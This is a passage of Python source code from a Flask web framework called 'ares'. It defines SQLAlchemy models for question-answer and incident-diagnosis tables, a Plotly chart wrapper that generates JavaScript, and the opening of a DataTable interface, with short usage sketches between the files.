def __init__(self, answer_id, value, usr_name, hostname):
self.answer_id, self.value, self.usr_name, self.hostname = answer_id, value, usr_name, hostname
class QuestionsAnswerMail(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_answer_mail'
answer_mail_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
answer_id = db.Column(db.Integer)
email_group = db.Column(db.String(120), nullable=False)
usr_name = db.Column(db.String(120), nullable=False)
clc_dt = db.Column(db.String(10), nullable=False, default=lambda: datetime.datetime.today().strftime('%Y-%m-%d'))
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False) # This is mandatory when data can come from outside
def __init__(self, answer_id, email_group, usr_name, hostname):
self.answer_id, self.email_group, self.usr_name, self.hostname = answer_id, email_group, usr_name, hostname
class QuestionsAnswerExra(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_answer_extra'
answer_extra_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
answer_id = db.Column(db.Integer, nullable=False)
extra_content = db.Column(db.String(120), nullable=False)
usr_name = db.Column(db.String(120), nullable=False)
clc_dt = db.Column(db.String(10), nullable=False, default=lambda: datetime.datetime.today().strftime('%Y-%m-%d'))
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False) # This is mandatory when data can come from outside
def __init__(self, answer_id, extra_content, usr_name, hostname):
self.answer_id, self.extra_content, self.usr_name, self.hostname = answer_id, extra_content, usr_name, hostname
class QuestionsLinkExt(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_link_external'
link_ext_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
issue_id = db.Column(db.Integer)
system_code = db.Column(db.String(10), nullable=False)
system_id = db.Column(db.Text, nullable=False)
title = db.Column(db.Text, nullable=False)
usr_name = db.Column(db.String(120), nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False) # This is mandatory when data can come from outside
def __init__(self, issue_id, system_code, system_id, title, usr_name, hostname):
self.issue_id, self.system_code, self.system_id, self.title, self.usr_name, self.hostname = issue_id, system_code, system_id, title, usr_name, hostname
class QuestionsLinkTopic(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_link_topic'
link_topic_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
issue_id = db.Column(db.Integer)
related_question_id = db.Column(db.Integer)
usr_name = db.Column(db.String(120), nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False) # This is mandatory when data can come from outside
def __init__(self, issue_id, related_question_id, usr_name, hostname):
self.issue_id, self.related_question_id, self.usr_name, self.hostname = issue_id, related_question_id, usr_name, hostname
```
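
A hedged usage sketch for these question models; the import path and values are illustrative assumptions and a Flask application context is required:

```python
from app import db
from ares.Lib.db.SqlTableQuestions import Questions, QuestionsTags, QuestionsAnswer  # illustrative path

q = Questions("Proxy timeout on login", "The login page times out behind the proxy",
              "question", "OPEN", 0, "public", "jdoe", 0, "host01")
db.session.add(q)
db.session.commit()  # populates q.issue_id
db.session.add(QuestionsTags(q.issue_id, "network", "jdoe"))
db.session.add(QuestionsAnswer(q.issue_id, "Increase the proxy timeout", "asmith",
                               "OPEN", "public", 0, "host01"))
db.session.commit()
```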
#### File: Lib/db/SqlTablesIncidents.py
```python
from app import db
import datetime
class IncRepo(db.Model):
"""
:dsc:
Store the final message and create the description of the incident.
  Incident descriptions are standardised, which will allow a machine to reuse the data in the same way that we use logs.
  This table will be updated at the end of the tree process. The only information that the users will be able to add is the cmmt.
  This framework will not replace any other system in charge of keeping track of the different interactions within the team to solve the problem.
  The status of the incident should not be stored here. This framework is only dedicated to providing a dynamic score and to trying to diagnose the incident
"""
__bind_key__ = 'incidents'
__tablename__ = 'incidents'
inc_id = db.Column(db.Integer, primary_key=True, nullable=False)
ticket = db.Column(db.Text) # Produced from the system in charge of storing the incident history
dsc = db.Column(db.Text) # Created automatically from the tree
cmmt = db.Column(db.Text) # Added by the user to detail the issue (to allow the creation of extra branches)
team = db.Column(db.Text, nullable=False) # The team in charge of the incident from the question
start_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
  usr_name = db.Column(db.String(120), nullable=False)  # Should be retrieved from the SSO in the future
  pry = db.Column(db.Integer, nullable=False)  # Should be the result of the scoring algorithm
status = db.Column(db.Text)
tree = db.Column(db.Text)
last_q_id = db.Column(db.Integer, nullable=True)
hostname = db.Column(db.String(120), nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
time_spent = db.Column(db.Interval, nullable=True)
def __init__(self, ticket, dsc, cmmt, team, pry, status, tree, usr_name, hostname):
self.ticket, self.dsc, self.cmmt, self.team, self.pry, self.status, self.tree, self.usr_name, self.hostname = ticket, dsc, cmmt, team, pry, status, tree, usr_name, hostname
class IncScoreDtls(db.Model):
"""
:dsc:
  In this table will be stored the details of the scoring algorithm for an incident.
  The column attrs will store the details in a json format. inc_id is the primary key in the incident table.
This will be created when the button "start diagnosis" is clicked
"""
__bind_key__ = 'incidents'
__tablename__ = 'incidents_score_info'
score_id = db.Column(db.Integer, primary_key=True, nullable=False)
inc_id = db.Column(db.Integer)
attrs = db.Column(db.Text)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False)
def __init__(self, inc_id, attrs, hostname):
self.inc_id, self.attrs, self.hostname = inc_id, attrs, hostname
class IncPryOvr(db.Model):
"""
:dsc:
Table to allow the end user to override the automated score allocated to an incident.
  This action will also help on constantly reviewing the incident priorities algorithm by checking those overrides.
  Any answer can have a score in order to help refine the algorithm and get something in line with the users' expectations.
The default priority of an answer is 0
"""
__bind_key__ = 'incidents'
__tablename__ = 'incidents_pry_ovr'
inc_id = db.Column(db.Integer, primary_key=True, nullable=False)
code = db.Column(db.Text)
  pry = db.Column(db.Integer, nullable=False)  # Should be the result of the scoring algorithm
  lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
  usr_name = db.Column(db.String(120), nullable=False)  # Should be retrieved from the SSO in the future
cmmt = db.Column(db.Text)
hostname = db.Column(db.String(120), nullable=False)
def __init__(self, code, pry, usr_name, cmmt, hostname):
self.code, self.pry, self.usr_name, self.cmmt, self.hostname = code, pry, usr_name, cmmt, hostname
# --------------------------------------------------------------------
# IA Algorithm
#
# This should be based on a decision tree to get a predictive model
# This decision tree should then be updated by the learning https://en.wikipedia.org/wiki/Decision_tree_learning
class IncQuestionsBase(db.Model):
"""
:dsc:
  Main table of the incident diagnosis. This will store the list of questions. Questions of different levels are mixed in the same table.
  A level will correspond to a tree. Basically level 0 is the basic level for an incident. Once the incident is defined by a user, it will go to the tree of the relevant team.
  Each team will then have a level and each node will ensure the necessary steps are done to pass to the next team.
"""
__bind_key__ = 'incidents'
__tablename__ = 'tree_questions_base'
q_id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.Text, nullable=False)
dsc = db.Column(db.Text, nullable=False)
lvl = db.Column(db.Integer)
details = db.Column(db.Boolean, default=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
  usr_name = db.Column(db.String(120), nullable=False)  # Should be retrieved from the SSO in the future
hostname = db.Column(db.String(120), nullable=False)
def __init__(self, name, dsc, lvl, usr_name, hostname):
self.name, self.dsc, self.lvl, self.usr_name, self.hostname = name, dsc, lvl, usr_name, hostname
class IncSplitDb(db.Model):
"""
:dsc:
  Table in charge of splitting the questions and the answers. This will allow a better partitioning of the data (even in a traditional SQL model).
  This will allow the creation of small tables and potentially the creation of different trees
"""
__bind_key__ = 'incidents'
__tablename__ = 'tree_split_db'
split_id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.Text, nullable=False)
db_suffix = db.Column(db.Text, nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
  usr_name = db.Column(db.String(120), nullable=False)  # Should be retrieved from the SSO in the future
def __init__(self, name, db_suffix, usr_name):
self.name, self.db_suffix, self.usr_name = name, db_suffix, usr_name
class IncAdvicesBase(db.Model):
"""
:dsc:
  This table will allow the display of advices in order to try to solve the problem in an automated manner.
  This table can be filled by advanced users but also by the different development teams
"""
__bind_key__ = 'incidents'
__tablename__ = 'tree_advices_base'
c_id = db.Column(db.Integer, primary_key=True, nullable=False)
q_id = db.Column(db.Integer, nullable=False)
text = db.Column(db.Text)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
  usr_name = db.Column(db.String(120), nullable=False)  # Should be retrieved from the SSO in the future
hostname = db.Column(db.String(120), nullable=False)
def __init__(self, q_id, text, usr_name, hostname):
self.q_id, self.text, self.usr_name, self.hostname = q_id, text, usr_name, hostname
class IncQAGroupBase(db.Model):
"""
:dsc:
  This table will link the question to a dedicated group of answers.
  So basically a group of answers can be linked to multiple questions.
  This will allow the tree to link two branches and avoid duplicating the same series of questions
"""
__bind_key__ = 'incidents'
__tablename__ = 'tree_question_group_base'
g_id = db.Column(db.Integer, primary_key=True, nullable=False)
q_id = db.Column(db.Integer, nullable=False)
a_grp_id = db.Column(db.Integer, nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
  usr_name = db.Column(db.String(120), nullable=False)  # Should be retrieved from the SSO in the future
hostname = db.Column(db.String(120), nullable=False)
def __init__(self, q_id, a_grp_id, usr_name, hostname):
self.q_id, self.a_grp_id, self.usr_name, self.hostname = q_id, a_grp_id, usr_name, hostname
class IncAnswersBase(db.Model):
"""
:dsc:
  This table will store all the different groups of answers.
  Each answer will get the following question id and the database suffix in case of a split of the questions (to avoid overly large tables)
"""
__bind_key__ = 'incidents'
__tablename__ = 'tree_answer_base'
a_id = db.Column(db.Integer, primary_key=True, nullable=False)
value = db.Column(db.Text)
db_suffix = db.Column(db.Text) # If the db is still in the base framework
a_grp_id = db.Column(db.Integer, nullable=False)
pry = db.Column(db.Integer, nullable=False)
team = db.Column(db.Text, nullable=False) # The team in charge of the incident from the question
q_dst_id = db.Column(db.Integer, nullable=True)
valid = db.Column(db.Integer)
ares_usr_nam = db.Column(db.Text, nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
  usr_name = db.Column(db.String(120), nullable=False)  # Should be retrieved from the SSO in the future
hostname = db.Column(db.String(120), nullable=False)
def __init__(self, value, a_grp_id, pry, team, q_dst_id, valid, ares_usr_nam, usr_name, db_suffix, hostname):
self.value, self.a_grp_id, self.pry, self.team, self.q_dst_id = value, a_grp_id, pry, team, q_dst_id
self.valid, self.ares_usr_nam, self.usr_name, self.db_suffix = valid, ares_usr_nam, usr_name, db_suffix
self.hostname = hostname
# --------------------------------------------------------------------
# Scoring containers
#
# All those tables will be used in the process of allocating a score to the incident
class IncUserLevel(db.Model):
"""
:dsc:
  Table in charge of defining the correct level for a team. This will allow the construction of multiple dimensions in case of issue.
  For example a user at level 0 will not see the level 1 branches of the diagnosis as they will not be able to perform the actions.
"""
__bind_key__ = 'incidents'
__tablename__ = 'tree_user_level'
lvl_id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.Text)
score = db.Column(db.Integer, nullable=False)
def __init__(self, name, score):
self.name, self.score = name, score
class IncProcesses(db.Model):
"""
:dsc:
"""
__bind_key__ = 'incidents'
__tablename__ = 'processes'
proc_id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.Text)
score = db.Column(db.Integer, nullable=False)
def __init__(self, name, score):
self.name, self.score = name, score
class IncPerimeter(db.Model):
"""
:dsc:
"""
__bind_key__ = 'incidents'
__tablename__ = 'perimeter'
id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.Text)
score = db.Column(db.Integer, nullable=False)
def __init__(self, name, score):
self.name, self.score = name, score
class IncBussImpact(db.Model):
"""
:dsc:
  Table in charge of storing the different business impact categories and their scores.
"""
__bind_key__ = 'incidents'
__tablename__ = 'bus_impact'
id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.Text)
score = db.Column(db.Integer, nullable=False)
def __init__(self, name, score):
self.name, self.score = name, score
class IncRepImpact(db.Model):
"""
:dsc:
"""
__bind_key__ = 'incidents'
__tablename__ = 'rep_impact'
id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.Text)
score = db.Column(db.Integer, nullable=False)
def __init__(self, name, score):
self.name, self.score = name, score
class IncUrgency(db.Model):
"""
:dsc:
"""
__bind_key__ = 'incidents'
__tablename__ = 'urgency'
id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.Text)
score = db.Column(db.Integer, nullable=False)
def __init__(self, name, score):
self.name, self.score = name, score
```
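
The static scoring tables above (processes, perimeter, bus_impact, rep_impact, urgency, tree_user_level) all share the same name/score shape, so they can be seeded and read back with the loadStatics / getStatics helpers shown earlier. A hedged sketch with illustrative scores:

```python
# Seed two static scoring tables, then read one back as a dict.
loadStatics('urgency', {'Low': 0, 'Medium': 5, 'High': 10})
loadStatics('bus_impact', {'Internal': 1, 'Client facing': 8})
assert getStatics('urgency')['High'] == 10
```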
#### File: Lib/graph/AresHtmlGraphPlotly.py
```python
import json
from ares.Lib.html import AresHtml
from ares.Lib.graph import AresHtmlGraphFabric
DSC = {
'eng': '''
'''
}
class Chart(AresHtml.Html):
"""
:category: Chart Interface
:rubric: PY
:dsc:
Standard Charting interface to wrap the Plotly.js module.
:link Plotly Documentation: https://plot.ly/javascript/plotlyjs-function-reference/#common-parameters
chartOptions = {'showGrid': False, 'showLabels': True, 'zoom': False, 'legend': {'position': 'bottom'} }
"""
name, category, callFnc = 'Plotly', 'Charts', 'plotly'
__reqJs = ['plotly']
__pyStyle = ['CssDivChart']
def __init__(self, aresObj, chartType, data, width, widthUnit, height, heightUnit, title, chartOptions, toolsbar, htmlCode, globalFilter):
if chartOptions is None:
chartOptions = {}
super(Chart, self).__init__(aresObj, [], width=width, widthUnit=widthUnit, height=height, heightUnit=heightUnit, code=htmlCode)
self._layout, self.options, self.seriesProperties = {}, {"displaylogo": False, 'responsive': True, 'autosize': True}, {'static': {}, 'dynamic': {}}
self.toolsbar, self.height = toolsbar, height
if AresHtmlGraphFabric.CHARTS_FACTORY is None:
      AresHtmlGraphFabric.CHARTS_FACTORY = AresHtmlGraphFabric.loadFactory()  # atomic function to store all the different chart mappings
self.__chart = AresHtmlGraphFabric.CHARTS_FACTORY[self.name][chartType](aresObj, data, self.seriesProperties)
if self.__chart.jsType is not None:
# Simple remapping to be able to reuse existing transformation functions for new chart configurations
# This will allow the creation of dynamic configurations based on existing charts
data._schema['out']['config'] = data._schema['out']['name']
data._schema['out']['name'] = "%s_%s" % (data._schema['out']['family'], self.__chart.jsType.replace("-", ""))
self.__chart.data.attach(self)
if not 'type' in self.seriesProperties['static']:
self.seriesProperties['static']['type'] = self.__chart._attrs.get('type', getattr(self.__chart, 'chartObj', None))
self.addLayout({"xaxis": {"showgrid": chartOptions.get("showGrid", False), 'showline': chartOptions.get("showGrid", False)},
"yaxis": {"showgrid": chartOptions.get("showGrid", False), 'showline': chartOptions.get("showGrid", False)}} )
self.addLayout({"showlegend": chartOptions.get("showLabels", True)})
self.setSeriesColor(aresObj.cssObj._charts)
if title is not None:
self.addLayout({"title": title})
if self.__chart._layout is not None:
self.addLayout(self.__chart._layout)
if chartOptions is not None and 'legend' in chartOptions:
if chartOptions['legend'].get('position') == 'bottom':
self.addLayout({"legend": {"orientation": "h"}})
self.addLayout({"xaxis": {"fixedrange": chartOptions.get("zoom", False)}, "yaxis": {"fixedrange": chartOptions.get("zoom", False)}})
if htmlCode is not None and globalFilter is not None:
if globalFilter is True:
self.filter(data._jqId, list(self.__chart.data._schema['keys'])[0])
else:
self.filter(**globalFilter)
self.click('''
if(%(breadCrumVar)s['params']['%(htmlCode)s'] == data.name){%(breadCrumVar)s['params']['%(htmlCode)s'] = ''}
else{%(breadCrumVar)s['params']['%(htmlCode)s'] = data.name}
''' % {'htmlCode': self._code, 'breadCrumVar': self.aresObj.jsGlobal.breadCrumVar})
def onDocumentLoadFnc(self): return True
def onDocumentReady(self):
self.aresObj.jsOnLoadFnc.add(
'''
%(jsChart)s;
''' % {'jsChart': self.jsGenerate(jsData=None), 'htmlId': self.htmlId} )
@property
def eventId(self): return "document.getElementById('%s')" % self.htmlId
@property
def jsQueryData(self): return "{event_val: event.points[0].value, name: event.points[0].label, event_code: '%s' }" % self.htmlId
def filter(self, jsId, colName, allSelected=True, filterGrp=None):
"""
:category: Data Transformation
:rubric: JS
:type: Filter
:dsc:
    Link the data to the filtering function. The records will be filtered based on the component value
:return: The Python Html Object
"""
self.aresObj.jsOnLoadFnc.add("%(breadCrumVar)s['params']['%(htmlCode)s'] = ''" % {'htmlCode': self._code, 'breadCrumVar': self.aresObj.jsGlobal.breadCrumVar})
val = "%(breadCrumVar)s['params']['%(htmlCode)s'] " % {'htmlCode': self._code, 'breadCrumVar': self.aresObj.jsGlobal.breadCrumVar}
if allSelected:
self.aresObj.jsSources.setdefault(jsId, {}).setdefault('filters', {'allIfEmpty': []})[colName] = val
self.aresObj.jsSources.setdefault(jsId, {})['filters']['allIfEmpty'].append(colName)
else:
self.aresObj.jsSources.setdefault(jsId, {}).setdefault('filters', {})[colName] = val
return self
# ---------------------------------------------------------------------------------------------------------
# JAVASCRIPT EVENTS
# ---------------------------------------------------------------------------------------------------------
def jsUpdateChart(self, jsData='data', jsDataKey=None, isPyData=False):
"""
:category: Chart Update
:rubric: JS
:type: Event
:dsc:
Update the chart following an event
:link Plotly Documentation: https://plot.ly/javascript/plotlyjs-function-reference/#plotlyupdate
:return:
"""
if isPyData:
jsData = json.dumps(jsData)
if jsDataKey is not None:
jsData = "%s.%s" % (jsData, jsDataKey)
return "Plotly.update('%(htmlId)s', %(jsData)s, {});" % {'htmlId': self.htmlId,
'jsData': self.__chart.data.setId(jsData).getJs([('extend', self.seriesProperties)])}
def jsDestroy(self): return "Plotly.purge('%s')" % self.htmlId
def jsRefreshSeries(self, jsData='data', jsDataSeriesNames=None, jsDataKey=None, isPyData=False):
"""
    :category: Chart Series
    :rubric: JS
    :type: Event
    :dsc:
    Refresh the chart series by removing the outdated ones and adding the new ones.
"""
a = self.jsDelSeries(jsData=jsData, jsDataKey=jsDataSeriesNames, isPyData=isPyData)
b = self.jsAddSeries(jsData=jsData, jsDataKey=jsDataKey, isPyData=isPyData)
return ";".join([a, b])
def setType(self, htmlObj):
"""
:category: Chart Type
:rubric: JS
:type: Configuration
:dsc:
    Set the chart type based on the value of an AReS component
:return: The Python Chart object
"""
self.addAttr("type", htmlObj.val, isPyData=False)
return self
def jsDelSeries(self, jsData='data', jsDataKey=None, isPyData=False):
"""
:category: Chart Series
:rubric: JS
:type: Event
:dsc:
    Remove the given series from the chart.
:return: The Javascript string to remove the selected series (based on the ID)
"""
if isPyData:
jsData = json.dumps(jsData)
if jsDataKey is not None:
jsData = "%s.%s" % (jsData, jsDataKey)
return '''
var seriesIds = [] ;
%(seriesNames)s.forEach(function(series, i){if(%(jsData)s.indexOf(series) > -1 ){seriesIds.push(i)}});
Plotly.deleteTraces('%(htmlId)s', seriesIds);''' % {'htmlId': self.htmlId, "jsData": jsData,
'seriesNames': json.dumps(self.__chart.data._schema['out']['params'][0])}
def jsAddSeries(self, jsData='data', jsDataKey=None, isPyData=False):
"""
:category: Chart Series
:rubric: JS
:type: Event
:example: chartObj.jsAddSeries( {y: [5000, null], x: ['Serie1', 'Serie2'], type: 'bar'} )
:dsc:
Add the new series to the chart.
:return: The Javascript string to add the new series
"""
if isPyData:
jsData = json.dumps(jsData)
if jsDataKey is not None:
jsData = "%s.%s" % (jsData, jsDataKey)
return '''
var newSeries = %(jsData)s;
if(Array.isArray(newSeries)){}
else{newSeries.name = newSeries.label; Plotly.addTraces('%(htmlId)s', [newSeries])}
''' % {'htmlId': self.htmlId, "jsData": jsData}
def jsFlow(self, jsData='data', jsDataKey=None, isPyData=False):
"""
:category: Chart Series
:type: Update
:rubric: JS
:example: chartObj.jsFlow({"columns": [['x', 'Test'], ['value', 2000], ['value2', 4000]], 'length': 0}
:dsc:
:return: The Javascript event as a String
"""
if isPyData:
jsData = json.dumps(jsData)
if jsDataKey is not None:
jsData = "%s.%s" % (jsData, jsDataKey)
return "Plotly.extendTraces('%(htmlId)s', %(jsData)s, [0]);" % {'htmlId': self.htmlId, "jsData": jsData}
def jsGenerate(self, jsData='data', jsDataKey=None, isPyData=False, jsId=None):
"""
:category: Chart Re Build
:rubric: JS
:type: System
:dsc:
Generate (or re build) the chart.
:return: The Javascript event as a String
"""
if isPyData:
jsData = json.dumps(jsData)
if jsDataKey is not None:
jsData = "%s.%s" % (jsData, jsDataKey)
return '''
if(window['%(htmlId)s_chart'] === undefined){
window['%(htmlId)s_chart'] = Plotly.newPlot('%(htmlId)s', %(jsData)s, %(jsLayout)s, %(options)s)}
else { window['%(htmlId)s_chart'] = Plotly.react('%(htmlId)s', %(jsData)s, %(jsLayout)s, %(options)s) } ; %(time)s
''' % {'htmlId': self.htmlId, 'jsData': self.__chart.data.setId(jsData).getJs([('extend', self.seriesProperties)]),
'jsLayout': json.dumps(self._layout), 'options': json.dumps(self.options),
'time': AresHtmlGraphFabric.Chart.jsLastUpdate(self.htmlId)}
# ---------------------------------------------------------------------------------------------------------
# PYTHON CONFIGURATION
# ---------------------------------------------------------------------------------------------------------
def axis(self, typeAxis, title=None, type=None):
"""
:category: Chart Re Build
:rubric: JS
:type: Configuration
:dsc:
Change the usual axis parameters of the chart.
:link Plotly Documentation: https://plot.ly/javascript/reference/#layout-xaxis-type
:return: The Python Chart Object
"""
if title is not None:
self.addLayout({"%saxis" % typeAxis: {"title": title}})
if type is not None:
self.addLayout({"%saxis" % typeAxis: {"type": type}})
return self
def yFormat(self, formatFnc, label=None, options=None, isPyData=False):
""" No need to use this function plotly will format automatically the axis """
return self
def xFormat(self, formatFnc, label=None, options=None, isPyData=False):
""" No need to use this function plotly will format automatically the axis """
return self
def addSeries(self, type, label, data, options=None, color=None):
"""
:category:
:rubric: JS
:example:
:dsc:
Plotly.addTraces(graphDiv, {y: [1, 5, 7]}, 0);
:return: The Python Chart Object
"""
if options is None:
options = {}
seriesIndex = len(self.__chart.data._schema['values'])
self.__chart.data._data[label] = data
self.__chart.data._schema['values'].add(label)
self.__chart.data._schema['fncs'][0]['args'][1].append(label)
self.seriesProperties['dynamic'][seriesIndex] = options
return self
def addAttr(self, key, val=None, tree=None, category=None, isPyData=True):
"""
:category:
:rubric: JS
:type: Configuration
:example:
:dsc:
:return: The Python Chart Object
"""
return self
def addSeriesAttr(self, seriesId, data, dataType="dynamic"):
"""
:category: Chart Series properties
:rubric: PY
:example: chartOjb.addSeriesAttr(0, {'hoverinfo': 'none', 'type': 'scatter'})
:dsc:
    Add attributes to the selected series in the dataset. The series is defined by its index (number) starting from
    zero in the dataset.
:link Plotly Documentation: https://plot.ly/javascript/bar-charts/
:return: The Python Chart Object
"""
self.__chart.seriesProperties[dataType].setdefault(seriesId, {}).update(data)
return self
def setSeriesColor(self, colors, seriesIds=None):
"""
:category: Chart Series colors
:rubric: PY
:type: Configuration
:example: aresObj.cssObj.colorObj.getColors('#FFFFFF', '#008000', 10)
:return: The Python Chart Object
"""
self.__chart._colors(colors, seriesIds)
return self
def addLayout(self, data):
"""
:example: chartOjb.addLayout( {'barmode': 'stack'} )
"""
self._layout.update(data)
return self
def click(self, jsFncs):
"""
:category:
:rubric: JS
:type: Events
:dsc:
:link Plotly Documentation: https://plot.ly/javascript/plotlyjs-events/
"""
self.jsFrg('plotly_click', jsFncs)
return self
def __str__(self):
"""
:category: Container Representation
:rubric: HTML
:type: Output
:dsc:
    Return the component HTML display. This Chart does not use the features of the function htmlContainer() as Plotly already provides
    most of them. So for those charts the display of the events might differ slightly from the other charts.
    :return: The HTML string to be added to the template.
"""
strChart = '<div id="%(htmlId)s" style="height:%(height)spx"></div>' % {'height': self.height - 30, 'htmlId': self.htmlId}
return AresHtmlGraphFabric.Chart.html(self, self.strAttr(withId=False, pyClassNames=self.pyStyle), strChart)
# ---------------------------------------------------------------------------------------------------------
# MARKDOWN SECTION
# ---------------------------------------------------------------------------------------------------------
@classmethod
def matchMarkDownBlock(cls, data):
return True if data[0].strip().startswith("---Plotly") else None
@staticmethod
def matchEndBlock(data):
return data.endswith("---")
@classmethod
def convertMarkDownBlock(cls, data, aresObj=None):
headers = data[1].strip().split("|")
    records, attr = [], {}  # attr is defined before the loop so "@" attribute lines are not lost
    for line in data[2:-1]:
      rec = {}
if line.startswith("@"):
dataAttr = line[1:].strip().split(";")
for d in dataAttr:
a, b = d.split(":")
attr[a] = b
continue
splitLine = line.replace(",", '.').strip().split("|")
for i, val in enumerate(splitLine):
if i == 0:
rec[headers[i]] = val
else:
rec[headers[i]] = float(val)
records.append(rec)
if aresObj is not None:
      p = aresObj.chart(data[0].split(":")[1].strip(), records, seriesNames=headers[1:], xAxis=headers[0], chartFamily='Plotly')
p.addAttr(attr, isPyData=False)
return []
```
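
For reference, a minimal markdown block that matchMarkDownBlock / convertMarkDownBlock above would accept; the chart type and values are illustrative assumptions:

```python
# With aresObj=None the records are parsed but no chart is rendered.
block = [
    "---Plotly: bar",     # matched by matchMarkDownBlock
    "x|Serie1|Serie2",    # pipe-separated headers, first column is the x axis
    "Q1|100|200",         # one record per line, ',' decimals are converted to '.'
    "Q2|150|250",
    "---",                # matched by matchEndBlock
]
Chart.convertMarkDownBlock(block, aresObj=None)
```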
#### File: Lib/html/AresHtmlDataTable.py
```python
import os
import json
import inspect
import importlib
import logging
from ares.Lib.html import AresHtml
from ares.Lib.js.tables import JsTableCols
import ares.configs.DataTable
# The object with all the different configurations available for the table interface
# This factory will pick up automatically when the server is restarted all the new configurations
FACTORY = None
DSC = {
'eng':
'''
:category: Table
:rubric: PY
:type: Factory
:dsc:
    Different configurations available for the table object. Those configurations will drive the kind of expected recordset.
    Indeed for some configurations some specific keys are expected to correctly display the data.
'''
}
# External Datatable extensions added on demand to add some extra features
# Details of the different extensions are available on the different websites
# https://datatables.net/extensions/
extensions = {
'rowsGroup': {'jsImports': ['datatables-rows-group']},
'rowGroup': {'jsImports': ['datatables-row-group'], 'cssImport': ['datatables-row-group']},
'fixedHeader': {'jsImports': ['datatables-fixed-header'], 'cssImport': ['datatables-fixed-header']},
'colReorder': {'jsImports': ['datatables-col-order'], 'cssImport': ['datatables-col-order'] },
'colResize': {'jsImports': ['datatables-col-resizable'], 'cssImport': ['datatables-col-resizable']},
'fixedColumns': {'jsImports': ['datatables-fixed-columns'], 'cssImport': ['datatables-fixed-columns']}
}
def loadFactory():
"""
:category: Table
:rubric: PY
:type: configuration
:dsc:
  This will read the table configuration folder and create a mapping between the names and the corresponding classes.
  Thus when a specific type of table is requested, it will be automatically mapped to the right class with the defined configuration.
  The data expected for any table is an AReS dataframe.
:return: The factory with all the table configuration
"""
tmp = {}
for script in os.listdir(os.path.dirname(ares.configs.DataTable.__file__)):
if script.startswith('DataTable') and not script.endswith('pyc'):
try:
for name, obj in inspect.getmembers(importlib.import_module("ares.configs.DataTable.%s" % script.replace(".py", "")), inspect.isclass):
if hasattr(obj, 'tableCall'):
tmp[getattr(obj, 'tableCall')] = obj
except Exception as err:
logging.warning( "%s, error %s" % (script, err) )
return tmp
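# Illustrative note: once loaded, FACTORY maps a configuration name to its class, e.g.
# FACTORY['base'](aresObj, headers, recordSet, jsTableId) as done in DataTable.__init__ below.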
class DataTable(AresHtml.Html):
"""
:category: Javascript - Datatable
:rubric: JS
:dsc:
  The python interface to the javascript Datatable framework. Not all the functions have been wrapped here but you should be able to
  perform the most frequent events and interactions with this component from the available functions.
  Please keep in mind that the javascript is only triggered in the web browser (namely not by the Python code)
:link Datatable website: https://datatables.net/
:link Datatable column legacy: http://legacy.datatables.net/usage/columns
:link Datatable column legacy: https://datatables.net/upgrade/1.10-convert
:link Datatable Column Definition: https://datatables.net/reference/option/columnDefs
"""
name, category, callFnc, docCategory = 'Table', 'Table', 'table', 'Standard'
references = {'DataTable': 'https://datatables.net/reference/index',
'DataTable Options': 'https://datatables.net/reference/option/',
'DataTable Ajax': 'https://datatables.net/reference/option/ajax.data',
'DataTable Callbacks': 'https://datatables.net/reference/option/drawCallback',
'DataTable Buttons': 'https://datatables.net/extensions/buttons/examples/initialisation/custom.html', }
__reqCss, __reqJs = ['datatables', 'datatables-export'], ['d3', 'datatables', 'datatables-export']
__pyStyle = ['CssDivLoading']
  # The javascript layer is not supposed to cast the data
  # Doing the cast there would be a huge loss in terms of efficiency in the browser renderer
__type = {'cell': 'data.val', 'tuple': 'data[0]'}
# Variable dedicated to the documentation of this class
  # This cannot and should not be used or accessed by other classes derived from this one
__doc__enums = {
'help': {"eng": "Get the list of enumerable items generated automatically from factories"},
}
def __init__(self, aresObj, tableTypes, recordSet, header, title, width, widthUnit, height,
heightUnit, tableOptions, toolsbar, htmlCode):
global FACTORY
super(DataTable, self).__init__(aresObj, [], code=htmlCode, width=width, widthUnit=widthUnit, height=height, heightUnit=heightUnit)
self.jsTableId, self.extraHeaders, self.tableOptions, self.header, self.footer = "%s_table" % self.htmlId, None, tableOptions, '', ''
self._systemOptions = dict(tableOptions.get('system', {}))
self._cols = JsTableCols.TableCols(aresObj)
if 'system' in tableOptions:
del tableOptions['system']
self.extraJsInitFnc, self.dsc_comment, self.tableWidth, self.toolsbar = set(), '', "100%", toolsbar
if FACTORY is None:
